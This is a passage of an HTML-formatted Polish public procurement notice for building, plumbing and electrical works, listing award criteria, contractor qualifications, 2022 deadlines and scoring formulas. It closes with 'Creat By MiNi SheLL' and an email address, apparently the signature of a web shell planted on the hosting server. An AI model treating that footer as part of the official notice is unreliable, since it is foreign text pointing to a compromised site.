dokumentacja stanowi załącznik do niniejszej specyfikacji warunków zamówienia i znajduje się na stronie internetowej Zamawiającego https://kowr.eb2b.com.pl/ w zakładce przedmiotowego postępowania </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 174074,07 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1.Kryterium „Cena brutto za przedmiot zamówienia” (C) – waga 60 %, 2.Kryterium „Termin realizacji przedmiotu zamówienia” (T) –waga 16 %, 3.Kryterium„Gwrancja-Rękojmia” (G) – waga 24 % Sposób przyznania punktów opisano w z rozdziale XVIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN REALIZACJI ZAMÓWIENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">16,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">GWARANCJA-RĘKOJMIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">24,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej.<br/>Niniejszy warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że:<br/>1)	w okresie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w tym okresie wykonał przynajmniej dwie roboty budowlane w zakresie, odbudowy, rozbudowy, nadbudowy, przebudowy, remontów budynków, na kwotę (brutto) przynajmniej 100 tys. złotych każda. <br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców warunek zostanie uznany za spełniony, jeżeli jeden z wykonawców wykaże się całym wymaganym doświadczeniem. Zamawiający nie uzna warunku za spełniony, jeżeli wszyscy uczestnicy w sumie wykażą się wymaganym doświadczeniem, ale żaden z nich indywidualnie go nie wykaże.<br/>2)	dysponuje osobami, skierowanymi do realizacji zamówienia, posiadającymi co najmniej następujące kwalifikacje tj:<br/>a)	przynajmniej jedną osobą, która będzie realizowała przedmiot umowy, w szczególności będzie odpowiedzialna za kierowanie robotami budowlanymi, posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w branży konstrukcyjno – budowlanej lub innej wymaganej prawem, w rozumieniu ustawy z dnia 7 lipca 1994r Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. (Dz. U. z 2019 r., poz. 831) w sprawie samodzielnych funkcji technicznych w budownictwie.<br/>b)	przynajmniej jedną osobą, która będzie realizowała przedmiot umowy, w szczególności będzie odpowiedzialna za kierowanie robotami budowlanymi, posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w branży instalacyjno - sanitarnej lub innej wymaganej prawem, w rozumieniu ustawy z dnia 7 lipca 1994r Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. (Dz. U. z 2019 r., poz. 831) w sprawie samodzielnych funkcji technicznych w budownictwie.<br/>c)	przynajmniej jedną osobą, która będzie realizowała przedmiot umowy, w szczególności będzie odpowiedzialna za kierowanie robotami budowlanymi, posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w branży elektrycznej lub innej wymaganej prawem, w rozumieniu ustawy z dnia 7 lipca 1994r Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. (Dz. U. z 2019 r., poz. 831) w sprawie samodzielnych funkcji technicznych w budownictwie.<br/>Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (tj. Dz.U. 2020 poz. 1333) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2020 poz. 220),<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców warunek zostanie uznany za spełniony, jeżeli jeden z wykonawców spełni warunek samodzielnie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków w postępowaniu, które stanowi załącznik Nr 2 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1)	wykazu robót budowlanych potwierdzającego wykonanie przynajmniej dwóch robót budowlanych w zakresie, budowy, odbudowy, rozbudowy, nadbudowy, przebudowy, remontów budynków kwotę (brutto) przynajmniej 100 tys. złotych każda, zrealizowanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty;<br/>2)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami tj. co najmniej: <br/>a)	jedną osobą, która będzie realizowała przedmiot umowy, w szczególności będzie odpowiedzialna za kierowanie robotami budowlanymi, posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w branży konstrukcyjno – budowlanej lub innej wymaganej prawem, w rozumieniu ustawy z dnia 7 lipca 1994r Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. (Dz. U. z 2019 r., poz. 831) w sprawie samodzielnych funkcji technicznych w budownictwie.<br/>b)	jedną osobą, która będzie realizowała przedmiot umowy, w szczególności będzie odpowiedzialna za kierowanie robotami budowlanymi, posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w branży instalacyjno – sanitarnej lub innej wymaganej prawem, w rozumieniu ustawy z dnia 7 lipca 1994r Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. (Dz. U. z 2019 r., poz. 831) w sprawie samodzielnych funkcji technicznych w budownictwie.<br/>c)	jedną osobą, która będzie realizowała przedmiot umowy, w szczególności będzie odpowiedzialna za kierowanie robotami budowlanymi, posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w branży elektrycznej lub innej wymaganej prawem, w rozumieniu ustawy z dnia 7 lipca 1994r Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. (Dz. U. z 2019 r., poz. 831) w sprawie samodzielnych funkcji technicznych w budownictwie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W taki przypadku wykonawcy ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców,<br/>oświadczenie, o niepodleganiu wykluczeniu z postępowania oraz spełniania warunków udziału w postępowaniu w zakresie,<br/>w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu składa każdy z wykonawców.<br/>Pozostałe szczegółowe informacje znajdują się w Rozdziale X SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia opisano w projektowanych postanowienia umownych stanowiących załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-21 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://kowr.eb2b.com.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-21 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> - W kryterium „CENA” wykonawca może uzyskać maksymalnie 60 pkt. Najwyższą ilość punktów uzyska oferta zawierająca najniższą cenę, pozostałe oferty proporcjonalnie mniej. Zamawiający przyjmie do obliczeń cenę oferty podaną w Formularzu oferty. Liczba punktów dla poszczególnych ofert zostanie wyliczona według następującego wzoru:<br/>C (uzyskana ilość punktów w kryterium „CENA”) = Cn (najniższa cena spośród ofert podlegających ocenie/ Cb (cena badanej oferty) x 60 pkt<br/>- W kryterium „TERMIN REALIZACJI ZAMÓWIENIA” Wykonawca może uzyskać maksymalnie 16 pkt:<br/>Zaproponowany w ofercie termin realizacji zamówienia będzie podlegał ocenie w następujący sposób . <br/>Termin realizacji zamówienia – 4 miesiące i krócej – 16 pkt.<br/>Termin realizacji zamówienia – 5 miesięcy – 8 pkt.<br/>Termin realizacji zamówienia – 6 miesięcy – 0 pkt.<br/>Oferty w których zaproponowano termin realizacji zamówienia dłuższy niż maksymalny wymagany (6 miesięcy), będą podlegały odrzuceniu na podstawie art. 226 ust. 1 pkt 5 ustawy Prawo zamówień publicznych, gdyż treść oferty jest niezgodna z warunkami zamówienia. W przypadku nie wpisania przez Wykonawcę terminu realizacji zamówienia w formularzu ofertowym, Zamawiający przyjmie do oceny termin realizacji zamówienia w wielkości 6 miesięcy. <br/>Zamawiający zastrzega, iż za wykonanie przedmiotu umowy w terminie dłuższym niż zaoferowany zostaną naliczone kary umowne. <br/>- W kryterium „GWARANCJA-RĘKOJMIA” Wykonawca może uzyskać maksymalnie 24 pkt<br/>Zaproponowany w ofercie okres gwarancji-rękojmi będzie podlegał ocenie w następujący sposób. Za każdy dodatkowy miesiąc ponad wymagane minimum 3 lata (36 miesięcy) przyznawany będzie 1 punkt <br/>Przykład <br/>Gwarancja-rękojmia 3 lata (36 miesięcy) – 0 pkt.<br/>Gwarancja-rękojmia 4 lata (48 miesięcy) – 12 pkt.<br/>Gwarancja- rękojmia 5 lat (60 miesięcy) i więcej – 24 pkt.<br/>Oferty w których zaproponowano gwarancję-rękojmie poniżej 3 lat (36 miesięcy) <br/>będą podlegały odrzuceniu na podstawie art. 226 ust. 1 pkt 5 ustawy Prawo zamówień publicznych, gdyż treść oferty jest niezgodna z warunkami zamówienia. W przypadku nie wpisania przez Wykonawcę terminu udzielonej gwarancji-rękojmi, Zamawiający przyjmie do oceny ofert okres udzielonej gwarancji-rękojmi w wymiarze 3 lat (36 mc).

Creat By MiNi SheLL
Email: jattceo@gmail.com